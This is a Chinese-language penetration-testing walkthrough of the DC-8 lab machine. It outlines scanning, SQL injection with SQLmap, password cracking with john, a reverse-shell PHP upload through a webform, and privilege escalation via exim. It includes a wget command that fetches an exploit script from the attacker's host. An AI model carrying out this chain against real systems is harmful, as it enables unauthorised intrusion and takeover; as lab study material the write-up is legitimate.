目录
一,靶场信息
二,信息收集
1,确定目标IP
2,扫描端口
3,漏洞扫描
三,渗透过程
访问网站页面
思路:当点击该页面的“welcome to DC8”字样时,发现上面的url变化为“http://192.168.86.162/?nid=1”,该页面有可能存在SQL注入漏洞。
使用SQLmap进行扫描
查询数据库
查询该数据库下的表名
查询表中的列名
查询用户名和密码
使用john密码破解工具进行破解
进行登录
在contact us>webform>form settings中发现可以上传PHP代码,上传一个反弹shell的代码
开启监听之后,在contact us中提交一个留言来反弹shell
四,提权
查看exim版本
cd /tmp
wget 192.168.86.130:8888/46996.sh
接着运行该文件,发现还是没法运行
原因:这个报错是由于windows系统下编辑然后上传到Linux系统执行导致的。
解决方案:本地编辑查看文件类型:set ff=unix
完了记得:wq保存。
再次上传